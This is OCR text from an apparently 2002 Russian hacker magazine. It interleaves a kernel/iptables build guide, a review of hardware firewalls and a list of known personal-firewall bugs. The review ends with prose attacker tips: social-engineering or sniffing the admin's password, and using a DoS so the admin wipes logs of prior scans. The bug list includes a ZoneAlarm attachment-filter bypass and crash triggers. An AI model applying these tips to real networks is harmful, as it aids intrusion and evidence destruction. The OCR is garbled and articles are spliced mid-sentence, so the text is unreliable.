Прежде чем ты сможешь воспользоваться МОЩНОЙ защитой пакетного 
фильтра, тебе ее надо предварительно включить в состав твоего ядра. Для 
этого тебе нужны: 


а) исходные тексты ядра Ипих; 
6) компилятор gcc; 
в) текстовый редактор. 


(Способ установки исходных текстов ядра зависит от того, какой дистрибу- 
тив у тебя установлен. Если у тебя Slackware, Gentoo, LFS или еще что-то в 
этом роде, то мне нефига тут перед тобой распинаться. Ты и сам знаешь, 
что и как устанавливается (иначе как ты воткнул себе этот дистриб?). 

В случае rpm-based дистрибутивов (ALT Linux, ASP Linux, Red Hat, 
Mandrake, SuSE, Connectiva) тебе нужно будет установить пакеты с исход- 
никами ядра и всеми причиндалами. Отдельная песня - дистрибутивы на 
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Добро пожаловать в ядерный реактор! Наверное, так следует 
поприветствовать начинающего монстра компьютерного мира, 
к которым ты себя причисляешь. Причем тут ядерный 
реактор?! Да ни при чем! А вот на ядре aka kernel стоит 
остановиться. 


основе пакетов deb (Debian, Corel), там проще - система установки, приня- 
тая в них, существенно облегчает установку нужных пакетов. 

В общем случае установка rpm-based дистрибутива в режиме разработчи- 
ка автоматически подразумевает установку компилятора и исходных тек- 
стов ядра. 

Ядро Linux ты также можешь скачать с ftp.kernel.org. На этом ftp-cepBepe 
лежат чистые ядра от разработчиков без каких-либо заплаток и дорабо- 
ток от изготовителей дистрибутивов (кстати, хорошо настроенное чистое 
ядро иногда работает гораздо лучше, чем ядро от изготовителя дистриба). 
Сам я пользуюсь дистрибутивами Mandrake Linux 7.0 (на самосборном яд- 
ре 2.2.20) и ALT Linux Master 2.0 (на штатном ядре 2.4.18). В любом слу- 
чае, какой бы дистрибутив ты ни выбрал, настройка и компиляция ядра 
ничем отличаться не будут. 

Ок, допустим, что у тебя все получилось, и ты таки установил требуемые 
компоненты. Посмотрим внутрь. Хочу предупредить, что все действия 
нужно совершать очень аккуратно, потому что ты будешь работать под 
root’om. 

В комплект ядра входит несколько утилит настройки. Простая текстовая, 
красивая текстовая и красивая графическая. Запуск каждой из них про- 
изводится из командной строки. 


Рис. 1. Консольная настройка ядра - ошибке 
не место! 


Графическая программа настройки ядра будет работать, только если ты ее 
запустил из терминала, работая с Х сервером. Для запуска программ наст- 
роек тебе надо будет перейти в каталог /usr/src/Llinux. 

Простая текстовая настройка выглядит не фонтан. По сути дела это набор 
вопросов, на которые ты должен будешь отвечать \, N или М. Это означа- 
ет, опция ядра включена или вкомпилена в ядро (У), опция выключена (№) 
или будет собрана как модуль (М). На рис. 1 показано, как это выглядит. 
Одна ошибка в ответе, и тебе придется все начинать с самого начала. Про- 
стая текстовая настройка запускается командой make config. 


Красивая текстовая программа настройки требует наличия на твоем ком- 
пе библиотеки псигсез. Так что проследи, чтобы эта хреновина у тебя бы- 
ла установлена. Запускается она выполнением команды таКе теписоп- 
fig. На рис. 2 показан вид этой проги. 

Первый и второй режимы настройки ядра прекрасно работают в тексто- 
вой консоли. 

Ну и третий вид. Графическая программа настройки ядра требует наличия 
у тебя языка программирования tck/tk и всех причиндалов к нему. Зато 
под Х это выглядит просто суперски (смотри на рис. 3). Запускается она 
из терминала командой make xconfig. 
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Рис. 2. Ядерное меню - можно немного 


расслабиться 


Преимущества второй и третьей программ наст- 
роек заключается в том, что ты в любой момент 
можешь включить или выключить любую опцию 
и только потом записать конфигурацию. Конфи- 
гурация ядра записывается в файл 
/usr/src/linux/.config. Все настройки лежат там 
в виде «параметр = значение». На рис. 4 как раз 
виден кусок файла конфигурации, отвечающий 
за настройки пакетного фильтра. 


Названия нужных тебе параметров ты можешь 
отрыть в подсказке программ настройки. На 
рис. 5 параметр выделен черным. 

Список параметров, которые необходимы для 
настройки пакетного фильтра, а также подроб- 
ное разъяснение, для чего это все нужно, нахо- 
AATCA B документе Iptables-tutorial 
(http://gazette.linux.ru.net /rus/articles/ipt- 
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Рис. 3. Графическая настройка - релаксируем 


ables-tutorial.html). Я тебе настоятельно реко- 
мендую его изучить. Если у тебя ядро 2.2.x, то 
тебе понадобится документ Ipchains-HOWTO. 
Его русский перевод есть на сайте linux.org.ru в 
разделе документы. Пересказать эти доки здесь 
нет никакой возможности, так что грызи их сам, 
как истинный никсоид. 


ЧТО ПОЛУЧАЕМ 


После того как мы закончили настройку параме- 
тров ядра, его надо собрать. Я тебя хочу предо- 
стеречь, чтобы ты не давил \ на все нужные те- 
бе опции. Дело в том, что куски кода, отвечаю- 
щие за работу тех или иных опций, будут вклю- 
чены в ядро, и оно станет очень большим, что 
может привести к траблам с компиляцией. Про- 
ще отобрать фишки, используемые непостоян- 
но, и оформить их в виде модуля. Потом этот 
модуль ты сможешь сам включить или выклю- 
чить в любое время. Ядра от производителей 


практически все со- 
держат именно в виде 
модулей. Так удобнее. 
Для сборки ядра тебе 
нужно выполнить ко- 
манды: 


make dep 

make bzImage 

make modules 

make modules_install 
make install 


Последняя команда yc- 

тановит ядро. Короче, 

всю эту науку прочита- 
ешь в Kernel-HOWTO. 
Гораздо удобнее вос- 
пользоваться ядром, иду- 
щим с дистрибутивом. 
Зачастую, там даже не нужны исходные тексты и 
не нужно пересобирать ядро самому, чтобы на- 
строить его по своему вкусу. Практически все 
опции ядра делаются в виде модулей, и тебе ос- 
тается только включить нужные. 
Для ядер 2.4.х модули, отвечающие за пакетный 
фильтр, лежат в каталоге /Llib/modules/2.4.x/ 
kernel/net/ipv4/netfilter. Для ядер 2.2.х - 
/lib/modules/2.2.x/net/ipv4. 
Загляни туда и увидишь огромную кучу файлов. 
Каждый из этих модулей отвечает за какую-ни- 
будь дополнительную функцию пакетного филь- 
тра. Если делать универсальную и гибкую систе- 
му, то тебе придется все оформить в виде моду- 
лей. Их получится немало. В моей системе их 71 
штука. Если их перечислять все, то я просто за- 
стрелюсь. Посмотрев на список внимательно и 
сбросив первое офигевание от количества фай- 
лов, ты увидишь, что 
модули можно поде- 
лить на несколько 
групп с общими при- 
знаками в названии. 
Группа ip_con- 
ntrack*.o. Модули 
этой группы использу- 
ются для трассировки 
соединений (даже не 
спрашивай меня, что 
это такое, все равно не 
скажу), а также приме- 
няются для трансляции 
адресов. В этой группе 
присутствуют модули 
для разных протоко- 
лов (ftp, irc, netlink, 
pptp, udp, tcp). 


Группа ip_nat*.o ис- 
пользуется для транс- 
ляции адресов (Network Address Tranlation, 
МАТ). Несколько модулей для различных прото- 
колов. 


Группа ipt*.o служит для управления и эксплу- 
атации пакетным фильтром iptables. Это добав- 
ление правила, установка маркировок, установ- 
ка владельца пакета, действия с пакетом и мно- 
гое другое. Наличие этой группы зависит от ус- 
тановленных параметров ядра CONFIG_IP_NF_*. 
Подробное описание этих параметров есть в 
Iptables-tutorial. 


Модуль ip_tables отвечает за пакетный фильтр, 
модули ipchains и ipfwadm отвечают за режим 
эмуляции пакетных фильтров ядер веток 2.2.х и 
2.0.x. Модули iptable_filter, iptable_mangle, ipt- 
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Рис. 4. Кусок файла конфигурации - можно 
поправить свои баги 


able_nat являются реализацией таблиц фильтрации пакетов (filter), ре- 
дактирования пакетов (mangle) и трансляции адресов (nat). 


Несмотря на такое множество модулей, система не настолько тупа, чтобы 
заставлять тебя, неразумного, все это загружать вручную. Хочу тебя обра- 
довать - большинство из этих модулей загружается автоматически при 
обработке заданных тобой правил. 


Собранный модуль включается из командной строки: insmod имя_модуля. 
Естественно, ты должен предварительно находиться в этом каталоге. Дру- 
гой способ - команда modprobe имя_модуля. Она поумнее и загрузит этот 
модуль и модули, зависящие от данного. 


Посмотреть наличие модуля в памяти можно командой [5то4. А удалить 
модуль можно командой rmmod имя_модуля. 


Вот, например, как это выглядит: 


[root@localhost root]# lsmod | grep ip_tables 
[root@localhost root]# modprobe ip_tables 
[root@localhost root]# lsmod | grep ip_tables 
ip_tables 10880 0 (unused) 

[root@localhost root]# rmmod ip_tables 
[root@localhost root]# lsmod | grep ip_tables 
[root@localhost root]# 


Первая строка - команда [5то4 с фильтром grep ip_tables - показывает, 
что такого модуля у нас нет. Второй запуск, после выполнения modprobe, 
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ПОДПИСЬ: Рис. 5: Хелпа - ищи и найдешь 


нам показывает, что модуль сидит в памяти и никем не используется. По- 
сле удаления модуля командой rmmod мы опять видим чистоту и порядок. 


РАБОТА НАД СОБОЙ 


А вот тебе материал для самостоятельной работы: 


1. Kernel-HOWTO 

2. Linux 2.4 Packet-filtering-HOWTO 

3. Ipchains-HOWTO 
(http://www.linux.org.ru:8100/books/HOWTO/index.html) 

4. Iptables-HOWTO 
(http://www.linuxguruz.org/iptables/howto/iptables-HOWTO.html) 

5. Firewall-HOWTO 
(http://linuxdocs.org/HOWTOs/Firewall-HOWTO.html) 

6. Netfilter-hacking-HOWTO 
(http://www.netfilter.org/documentation/HOWTO/netfilter-hack- 
ing-HOWTO.html) 

7. Iptables-tutorial 
(http://gazette.linux.ru.net/rus/articles/iptables-tutorial.html) 


Hy, вотты и в курсе, что сидит внутри ядра Linux и как с этим бороть- 


ся. Успехов и хорошего хака. 
=r 
=i 
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ПРО МАРКЕТИНГ 


Маркетинг постарался, и большинство покупателей и вправду представ- 
ляют себе файрволл в виде такой умной коробочки, которая от всего за- 
щищает. А гиганты сетевой промышленности - они же добрые, они не мо- 
гут обмануть надежды населения и такие коробочки выпускают и прода- 
ют. И называют их файрволлы. Есть и маленькие, не очень заметные по- 
дробности. Дело в том, что каждый гигант имеет свое собственное мнение 
про то, из каких деталей и какого софта должна состоять такая коробоч- 
ка, поэтому изучение существующих «стенок» очень похоже на науку 30- 
ологию, где сначала надо запомнить всех тварей, больших и малых, а по- 
том уже говорить «птица, это такая с крыльями» (и тут тебе, старик, пока- 
зывают летучую мышь, чтобы не задавался) :). 

Ну да, а у знакомого админа на большой богатой фирме можно увидеть в 
раке коробочку, синюю, красную или желтую, и услышать от него: «А вот 
файрволл стоит». Не, не он раком, а у него в раке :). Шкаф такой, понял, 
да? И в нем коробочка красная, высотой два-у. На передней панели инди- 
катор такой красивый, циферки всякие, лампочки. 

Ты, конечно, уже догадываешься, что внутри коробочки находится сильно 
(или не очень сильно) переделанный комп. То есть стоит мать, на матери 
- камень и мозги, в слоты воткнуто несколько сетевух, операционка и все 
настройки вместо харда пишутся во флешку, то есть доступ на запись в 
настройки сильно затруднен и крутящихся деталей минимум - одни венти- 
ляторы. Есть, конечно, исключения, но их мало, в основном так оно и уст- 
роено. 

Зоологический подход говорит нам, что стоит для начала разобраться с 
несколькими популярными моделями и попробовать понять, что можно 
ожидать от такой коробочки. Но начнем мы не с железки, как можно бы- 
ло бы думать, а с коммерческой программы. 


CHECKPOINT SOFTWARE 
(http://www.checkpoint.com) 


Почему софт, а He железка, старик? А дело в том, что это почти что стан- 
дарт коммерческого софта для файрволла. Как Апач для веба, как Фото- 
шоп для дизигна. И именно этот софт установлен во многих аппаратных 
файрволлах, выпускаемых крупны- 
ми фирмами. А в тех, где установ- 
лен другой софт, очень многие 
идеи слизаны отсюда. Теперь по- 
нятно? Дистрибутивы есть для 
большинства популярных *п1х 
платформ, ну и для Матушки Виндо- 
ус, само собой. 

Checkpoint не пытается продавать 
одно приложение на все случаи 
жизни, а честно предлагает собрать | 
систему из нескольких компонен- 
тов. Набор богатый, в том числе там 
есть межсетевой экран, сервер VPN, 
антифлудер, клиент для управле- 
ния всеми компонентами. Всего в 
списке их почти тридцать, но это 
для того, чтобы прилавок был пол- 
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ривет, старик! Как настроение? Хорошее, говоришь... Это 
правильно, старик, завари себе зеленого чаю, сядь в лотос и 
на сегодня никакого пива. Будем медитировать на железную 
стенку. Гоню, говоришь? Hy, это ты после вчерашнего, а я 
про железный файрволл. Наверное, ты уже почитал другие 
статьи в этом номере и понял, что файрволл - просто очень 
о и красивое слово, а не устройство и не приложение. 

лиенту говорят «брандмауэр» и потом сразу объясняют, что 
есть в строительстве такая конструкция, чтобы не дать огню 
распространяться по зданию :). Hy, ты меня понял ;). Это 
все от того, что тема про сетевую безопасность сейчас 
очень модная, и про хак пишут статьи все, кому не лень. А 
написав очередной рассказ про страшных хацкеров, говорят, 
что защита от них, конечно, есть - надо купить надежный 
файрволл. Ну а что под этим словом подразумевается, 
пишущий статью скорее всего сам не знает, но слово 
красивое, идея прямая и прозрачная, а потому желающих 
«купить файрволл» нынче хватает. 


рис. Ильдар Идиатулин 


ным, основных, разумеется, меньше. Давай посмотрим, что это чудо при- 
роды умеет. 

Первая и главная компонента это межсетевой экран Firewall-1, фильтрую- 
щий трафик между сетевыми интерфейсами. Правила фильтрации настра- 
ивает админ с помощью удобной и красивой клиентской части прямо со 
своего рабочего места. 


Для того чтобы скрыть адреса внутренней сети от внешнего мира, приме- 
няется трансляция сетевых адресов (МАТ). Пакет, прошедший через файр- 
волл с включенной МАТ, будет подписан не внутренним адресом машины, 
отправившей пакет, а тем адресом, который напишет туда файрволл (если 
настройка толковая, то в пакете остается только адрес самого файрвол- 
ла). То есть ты бы и рад нюкнуть какую-нибудь машину за файрволлом, но 
не знаешь их адресов, увы. Настраивается МАТ на том же клиенте. 


Но настоящего хацкера этим не напугать, разумеется, мы все равно будем 
тыкаться во все известные дыры. Против этого фирма Checkpoint предла- 
гает подробные и очень удобные для просмотра логи активности на лю- 
бом интерфейсе. IP-agpec твоего любимого Интернет-кафе будет виден 
сразу. Очень грамотно и толково сделаны сортировка и выборочная чист- 
ка логов, при желании можно вычистить из них 0005 атаку и посмотреть, 
что там происходило до того. Но это надо еще догадаться, что надо вычи- 
стить :). 


Да, при написании софта Checkpoint позаботилась и о тех несчастных, ко- 
торые бродят вдали от фирмы со своими ноутбуками. Для них есть модуль 
VPN-1, серверная часть которого ставится на один из серверов фирмы, a 


Список правил трансляции внутренних адресов Checkpoint 
Firewall-1 


клиентская Часть - на ноутбук. При соединении клиентская часть находит 
свой сервер, они сливаются и в едином порыве создают шифрованный 
туннель, про который ты уже, наверное, читал в этом номере. 


В этом комплекте мне не удалось обнаружить прокси-сервера; видимо, с 
точки зрения Checkpoint, это не входит в понятие файрволла. 

Все настройки по максимуму сделаны графическими и интуитивными, во 
многих меню предлагаются типовые (и довольно грамотные) конфигура- 
ции. Одним словом, хороший продукт, через правильную настройку про- 
рываться будет очень сложно. 

Ho Checkpoint не делает железок. Он только продает свой софт тем, кто 
хочет поставить его на железки. И выпускает рекомендации, как готовить 
операционку для аппаратного файрволла. 


УКРЕПЛЕНИЕ ОСЕЙ 


Уже ближе к железу, старик. Как ты понимаешь, ставить что-либо на стан- 
дартного Пингвина из коробки и сразу вывешивать машину в Интернет - 
это смелость, граничащая с безумием. Поэтому сначала систему готовят к 
установке, а подготовленную называют «система с укрепленной ОС», что, 
видимо, должно успокоить клиента и отбить охоту у морально слабых. Все 


Е 


a Hi: hp 
1 Te ay pt a 
1 1 is 


Lh. = 


= = 


a a 


Удобные логи Checkpoint Firewall-1 


Ты же понимаешь, что главная дыра в защите 
находится между креслом и административной 
консолью. 


советы по укреплению OC для будущего файрволла довольно просты и ра- 
зумны и вполне подходят и для простых смертных. Жаль только, пользу- 
ются ими редко. 

Очень приблизительно последовательность укрепления системы выглядит 
так: вначале, при установке, убирают все ненужные службы и прибамба- 
сы. В Линуксе это делается через тип установки «Custom», при этом из бу- 
дущего файрволла удаляется всякая лабуда типа графики, звука, сервера 
новостей. Затем отключают все ненужные сервисы. Общее правило такое 
- чем меньше сервисов, тем спокойнее жизнь. Затем настраивают логи и 
удаляют ненужных юзеров, которых система заводит при установке по 
умолчанию. После этого на систему ставят все свежие патчи (для RedHat 
можно глянуть на страницу http://www.redhat.com/apps/support/errata/) 
и работают. Наверное, имеет смысл оставить все доки - опасности ноль и 
всегда под рукой :). 

И вот уже на такую систему ставят софт файрволла. Кстати, чтобы ты че- 
го не подумал, на работающем файрволле доступ во флешку, где записа- 
на операционка, защищен. И не паролем, а переключателем, админ пере- 
ключает его в положение «можно» только перед установкой свежего пат- 
ча от фирмы. 

Ну, хватит про софт, наверное, давай теперь про железо. 


КИСКА 


(http://www.cisco.com) 
Начнем с самых модных и стильных, TO есть с темно-синих коробочек 
Cisco. Фирма идет навстречу пожеланиям широких масс админов и хаке- 


ЗА ЖЕЛЕЗНЫМ ЗАНАВЕСОМ 


ров и постоянно расширяет линейку выпускаемых устройств. Недавно 
файрволлы были поделены на два семейства: PIX Firewall и 10S Firewall, 
при этом PIX позиционируется как мощный и промышленный, для сильно 
загруженных узлов, а IOS - как менее мощный, но универсальный, для не- 
больших фирм. Маркетинг называется, типа. 


Оба семейства умеют фильтровать пакеты в режиме межсетевого экрана, 
маскируют внутренние адреса через МАТ, поддерживают виртуальные ча- 
стные сети и управляются через 
специальный административный 
софт, который ставится на рабочем 
месте админа. Семейство IOS, кро- 
ме того, умеет фильтровать веб- 
трафик по именам сайтов, то есть 
админ сможет выборочно позакры- 
вать твои любимые сайты с веселы- 
ми картинками, оставив директору 
его собачек и лошадок. PIX же ста- 


Окно управления виртуальной частной сетью Checkpoint VPN-1 


вит рекорды производительности 
при поддержке шифрованных тун- 
нелей. 

Что там внутри за ось, для меня оста- 
лось загадкой. Cama Cisco говорит, 
что файрволлы работают на специ- 
альной «OC PIX собственной разра- 
ботки фирмы Cisco», но, по непрове- 
ренным слухам, это сильно переде- 
ланный и укрепленный SCO UNIX. 
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других, менее изобретательных 
фирм. Глядя на такую стойку, за- 


дать вопрос: «А есть ли у вас аппа- 
ратный файрволл?» - может только дальтоник. 

Как и Cisco, фирма Watchguard выпускает два семейства файрволлов: 
Firebox и Firebox Vclass. Наборы функций слегка различаются, у Vclass яв- 
ственно обозначен уклон в большую производительность и управление 
трафиком, в то время как Firebox, наверное, можно с большим основани- 
ем назвать настоящим файрволлом, если судить по тому количеству функ- 
ций, которым его умудрились нагрузить. Работает простой Firebox помед- 
леннее (хотя я бы не назвал пропускную способность в 200 мегабит в се- 
кунду очень медленной), но содержит море разных функций, гораздо 
больше, чем Киска. 


Основные функции файрволла, впрочем, присутствуют в обеих линейках: 
пакетный фильтр в виде межсетевого экрана с набором правил, маски- 
ровка внутренней сети через NAT, поддержка VPN и административная 
консоль. Какиу Cisco и Checkpoint, административная консоль очень кра- 
сивая и позволяет очень наглядно управлять и представлять себе всю 
структуру сети фирмы. Vclass может ограничивать уровень трафика Ha оп- 
ределенные адреса, что полезно для предотвращения флуда. Простая 
«пожарная машина» может также работать как прокси для нескольких ви- 
дов трафика, фильтровать веб-трафик, раздавать динамические ТР по 
DHCP иеще, и еще. Богатая система, в общем. Подкачала, пожалуй, систе- 
ма логов, в ней довольно скромные возможности для сортировки и выбо- 
рочной чистки. Это, кстати, может нам очень пригодиться, о чем ниже. 
Очень красив самописец, регистрирующий активность на интерфейсах, 
так все смотрел бы и смотрел бы. 


Внутри корпуса стоят системная плата с камнем от AMD и укрепленный 
Пингвин имени Красной шапочки. Вместо харда, как нетрудно догадаться, 
флешка. 


ЖЕЛЕЗНЫЙ НОРТОН 


(http://www.symantec.com) 

Кстати, знаешь ли ты, что любимая фирма Symantec делает не только 
софт, но и железо? Ага, и свои изделия украшает панелями дешевого жел- 
того цвета, надоевшего всем еще в Norton Antivirus и pcAnywhere. 
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Настройка правил фильтрации Firebox 


Все советы по укреплению ОС для будущего 
файрволла довольно просты и разумны и 
вполне подходят и для простых смертных. 
Жаль только, пользуются ими редко. 


Стильная коробочка от Cisco 


Webscreen отразит атаку и ничего не скажет админу 


O44 november/11/2002 


= 
о 
© 
ш 
a 
< 
= 
< 
|. 
= 
„В 
= 
|] 
ш 
= 
ш 
х 
< 
|. 


FIREWALL 


Доступ во флешку, где записана 
операционка, защищен. И не паролем, а 
переключателем. 


Эти файрволы когда-то делала фирма Axcent technologies, Ho Symantec ее 
купил и теперь, похоже, не очень понимает, зачем он это сделал. Во всяком 
случае, смельчаки, попробовавшие выступить в роли клиентов и получить 
от Symantec помощь в установке и настройке прибора, писали о перегово- 
рах с фирмой с недоумением и затаенной обидой. Видимо, поддержка же- 
лезяк там вроде нелюбимого дитяти. Но стоят железки дорого, даже очень. 
Есть два семейства файрволлов от Symantec (похоже, это такой упрощен- 
ный маркетинг для людей, привыкших к двоичной системе счисления), 
одни попроще, другие посложней. Семейство Firewall/VPN попроще, ce- 
мейство VelociRaptor посложнее. Функции файрволла умеренно полные, 
есть пакетный фильтр, по умолчанию включена сетевая адресная транс- 
ляция (МАТ), есть поддержка виртуальных частных сетей, сервер DHCP, 
логи внешней активности. Ну и софт для администрирования с разными 
оттенками знакомого желтого цвета. 


NOKIA: МЕЛОДИЯ ДЛЯ СЕРВЕРА 


Мда, я тебе специально ищу фирмы, про которые трудно подумать, что они вы- 
пускают сетевое оборудование. Про Nokia ты, наверное, знаешь, что они де- 
лают хорошие мобилы. Авторезина тоже очень приличная когда-то была, и те- 
левизоры. Теперь еще и файрволл. Наверное, не за горами презервативы. 
Это изделие работает на софте Checkpoint Software. Похоже, горячие 
финские парни хорошо поработали над установкой, отзывы о машине 
сплошь положительные, причем особо хвалят ее за гибкость при настрой- 
ке на нестандартные конфигурации, за быстродействие и за надежность. 
В качестве платформы для своего файрволла Nokia взяла типовой сервер 
и основательно поработала над его начинкой, операционкой и установ- 
ленным софтом. 


WEBSCREEN: DDOS > NULL 


A BOT это очень специализированное устройство. Ничего лишнего в нем 
нет, ни виртуальных сетей, ни прокси, ни даже любимого пакетного филь- 
тра. Webscreen 100 предназначен только для отражения 0005-атак и при- 
меняется в основном для защиты веб-серверов и других критических то- 
чек внешнего периметра, которые можно завалить такой атакой. 


Интересно, что сама фирма советует ставить свой экран на переднюю ли- 
нию, перед всеми прочими системами защиты, в том числе и перед файр- 
воллом. Принцип работы тоже довольно необычен: рабочие интерфейсы 
устройства не имеют своих собственных адресов, то есть с точки зрения 
прочих устройств Webscreen там просто отсутствует. Он и отсутствует - до 
тех пор, пока не распознает какую-нибудь атаку. Тогда он включается и 
начинает задерживать все подозрительные пакеты, отмечая это в логе. 
Третий интерфейс предназначен для управления, и ему может быть при- 
своен адрес, и через него можно работать с операционной системой. Вну- 
три стоит укрепленная версия RedHat Linux. Коробка корректно опреде- 
ляет и задерживает атаки Lan.d и буп-флуды. 

Теперь про смешное: для настройки ТР-адреса административного интер- 
фейса надо отредактировать конфигурационный файл, записать этот 
файл на дискету и вставить дискету в дисковод файрволла (да, у него есть 
дисковод!), чтобы он прочитал новую конфигурацию при перезагрузке. 
Только после такой процедуры удается соединиться с файрволлом по се- 
ти. Впрочем, можно просто воткнуть в коробку клавиши и монитор и за- 
дать адрес руками. Еще про смешное: файрволл никак не сигнализирует 
админу про то, что началась и происходит атака. То есть логи ведутся и 
очень подробно, но они копятся внутри коробочки. Машинки от других 
фирм, кстати, умеют звонить по телефону, отправлять SMS и вообще вся- 
чески портить админу заслуженные выходные. 


ПОЧЕМ ЗВОНИТ КОЛОКОЛ 


И не спрашивай, старик, все это железо очень дорогое. Производство этих 
коробок стало большим бизнесом, ведь продают не какую-то мелочь, а Безо- 
пасность Вашей Информации, а на сколько можно развести человека, приго- 
варивая «это решит все ваши проблемы», ты можешь себе представить. То 
железо, о котором я писал, стоит от нескольких тонн грина и выше. Рекорды 
ставят Киска и горячие финские парни: самая продвинутая Киска может сто- 
ить около семидесяти, а финики просят за свою машину полтинник. 
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Впрочем, такая цена может сильно расслабить админа, а вероятность 
ошибки в настройке дорогого ящика не меньше, а на мой взгляд, даже 
больше, чем обычного пня с парой сетевух и одним из бесплатных файр- 
воллов на Пингвине. 


ГДЕ ТОНКО, ТАМ И... 


Как ты понимаешь, шансы получить в свои хацкерские руки управление 
файрволлом не очень высоки. Как правило, для этого потребуются фир- 
менный софт для управления файрволлом и админ, который сообщит те- 
бе административный пароль к своему ненаглядному. Если ты сидишь во 
внутренней сети (ну интересно тебе, как устроена сетка на родной фир- 
ме), можно еще попытаться перехватить сеанс работы админа с файрвол- 
лом с помощью сниффера. Чтобы это получилось, однако, нужен на ред- 
кость тупой админ, который создаст тебе условия для такого перехвата: 
включит тебя в один хаб с собой или файрволлом, будет пользоваться 
простым телнетом. Можешь попробовать применить социальную инжене- 
рию, например, написать админу что-нибудь типа: «Привет, Вася, это я, 
вторая шизоидная компонента твоей личности. Если ты помнишь, сегодня 
я просыпаюсь и работаю с шести вечера до полуночи. Приклей к монито- 
ру листок с мастер-паролем от Киски, пжалста, я его забыл». 

Да, кстати, если ты снаружи, в Интернете, то про перехват управления 
файрволлом можешь просто забыть, толково подключенный файрволл не 
пустит тебя с внешнего интерфейса даже с правильным паролем. 

Будет гораздо плодотворнее, на мой взгляд, если ты попытаешься поис- 
кать ошибки настроек. Ты же понимаешь, что главная дыра в защите на- 
ходится между креслом и административной консолью. Советов на все 
случаи жизни не существует, да я и не знаю, зачем нужно пролезать че- 
рез файрволл :). Поэтому просто попробуем посмотреть, какие типичные 
ошибки может допустить админ и что из них следует. 

Порядок применения правил - очень коварная штука, потому что админ 
может сам открыть огромную дыру и не заметить ее. Дело в том, что поч- 
ти все файрволлы примеряют к пакету правила по очереди, в том поряд- 
ке, в котором они записаны, и выполняют первое подошедшее правило. 
То есть если правило номер 11 разрешает машине 192.168.11.10 все ви- 
ды обмена, а правило номер 14 запрещает всем смотреть WWW, то счаст- 
ливый юзер на машине 192.168.11.10 сможет лазить по вебу без ограни- 
чений. Как ты понимаешь, возможны и менее мирные варианты. 

Флуд логов: увы, во всех этих коробочках регистрация нашей с тобой деятель- 
ности устроена очень грамотно. В смысле - все как на ладони, видны адреса и 
удобно для просмотра, и совсем неудобно для высокохудожественной дея- 
тельности, которой мы с тобой занимаемся. То есть если просто сканировать 
открытые порты, то вся эта деятельность будет хорошо видна и, соответствен- 
но, наказуема. Почистить логи самому, как уже говорилось, почти нереально, 
но можно посканировать, выяснить все, что нужно, и затем устроить DoS-ata- 
ку. Завалить файрволл ты, скорее всего, так не завалишь, он как раз на такие 
штучки и рассчитан, но админ, придя с утра, скорее всего, порадуется на свою 
систему и... правильно, прибьет все логи вместе со следами твоих сканов :). 
Обходим МАТ: ты смотришь на файрволл снаружи и видишь только паке- 
ты, подписанные файрволлом? Ты хочешь знать внутренние адреса полю- 
бившейся тебе сети? Напиши веб-мастеру письмо про орфографическую 
ошибку на сайте и внимательно изучи заголовок ответа. Если повезет, ты 
увидишь там внутренний адрес. 


Конечно, железный файрволл это достойная преграда, но вовсе не 
безнадежная и вполне преодолимая при соответствующей подготов- 
ке. А если проще, то, как говорил старшина, «учи матчасть, боец». 


Салют :)! 
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С 14 октября по 20 ноября 2002 года 


Кубок России 


по поиску в интернете 


равила, регистрация и тренировки 
на сайте 
kubok.yandex.ru. 
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Найдётся всё! 
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ZONEALARM 


0-го-го-го!! Это персональный защитник - явный победитель данного обзора 
по количеству уязвимостей. Просто-таки решето какое-то! Но обо всем по 
порядку. 


Жук НОМЕР РАЗ 


В некоторых случаях ZoneAlarm принимает внешние (из Сети) соединения за 
внутренние (из локалы) и присваивает им самый низкий уровень защиты 
(нам это и нужно =). Программа рассматривает в качестве внутренних любые 
]Р-адреса, у которых первые два разряда совпадают с первыми двумя 
разрядами адреса самого пользователя. То есть, если ТР пользователя - 
66.66.66.66, то все адреса типа 66.66.*.* будут рассматриваться как 
безопасные (хотя на деле оказывается, что это просто айпишники того же 
прова - прим. ред.). В результате, при соединении с тачкой, имеющей такой 
ТР, фаерволл не будет обеспечивать необходимую защиту. 

Уязвимости подвержены все версии фаерволла, включая pro и фриварную... 


Жук НОМЕР ДВА 


В ZoneAlarm присутствует особенность MailSafe, используемая для 
блокировки электронных мессаг, содержащих аттачем исполняемые файлы. 
MailSafe может блокировать вложения файла с некоторым расширением, 
например, все «.ехе» файлы. Если тот же самый файл послан с 
дополнительной точкой (.), добавленной в конец к имени файла, такой файл 
не будет блокирован. Так что вири и трояны ждут своего череда... 
Уязвимости найдена в ZoneAlarm 3.0. 


Жук НОМЕР ТРИ 


Опять же дыра в MailSafe. Напоминаю, что MailSafe идентифицирует в 
почтовых вложениях потенциально вредные файлы (исключая: *.ехе, *.сот, 
*.гед, *.vbs или другие, которые могут быть добавлены в обычной 
конфигурации) и переименовывают их расширение в *.zl*; в то же самое 
время информация об этом поступает юзеру (Проснись! Тебя имеют! =)). 
Проблема связана с тем, что это приложение не может работать с очень 
длинными файлами, что-то типа: «аааааааааааааааааааа(и так далее).ехе». 
При этом происходит переполнение буфера, и система виснет. Вот такой 
персональный 3.142005 наступает юзеру ушастому от его «Персональной 
защиты»... 

Уязвимости подвержены все версии ZoneAlarm. 


TINY PERSONAL FIREWALL 
Жук НОМЕР PAS 


Если пользователь Tiny Personal Firewall пытается просмотреть файлы 
регистрации Personal Firewall Agent Logs в то время, как его порты во всю 
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Дарова, читатель! Сегодня я подготовил для тебя обзор 
известных дыр и уязвимостей в персональных фаерволлах, 
приводящих в одном случае к падению системы, в другом - 
к обходу защиты «огненной стены» и доступу к ресурсам. 
Так сказать, багатрака по теме. Итак, вникай - пригодится! 


рис. Константин Комардин 


сканит хакер Стасик, программа начнет использовать 100% ресурсов машины 
и зависнет. Такие невкусные ватрушки. 
Уязвимость обнаружена в Tiny Personal Firewall 3.0-3.0.6. 


Жук НОМЕР ДВА 


Еще один не очень известный баг очень известного фаерволла. Суть 
уязвимости в том, что если юзер ставит в настройках Tiny уровень защиты 
HIGH Security, а в этот момент все тот же хакер Стасик попытается 
просканировать порты его компа, перед этим подделав свой ТР на его, - все 
на хрен повиснет. Реализовать и понять этот баг можно у себя на машине и 
без Стасика. Ставишь в Tiny уровень защиты HIGH Security, потом запускаешь 
любой сканер портов и сканишь 127.0.0.1 - вот и виснет все =). В общем, 
если обращаться к машине «как бы» с ее же айпишника (будь то Инет или 


LAN), происходит «аварийное завершение работы системы» :). Так что, 
господа хакеры, нужно еще и ТР грамотно подделывать уметь... 
Уязвимость обнаружена в Tiny Personal Firewall 3.0-3.0.6. 


Жук НОМЕР ТРИ 


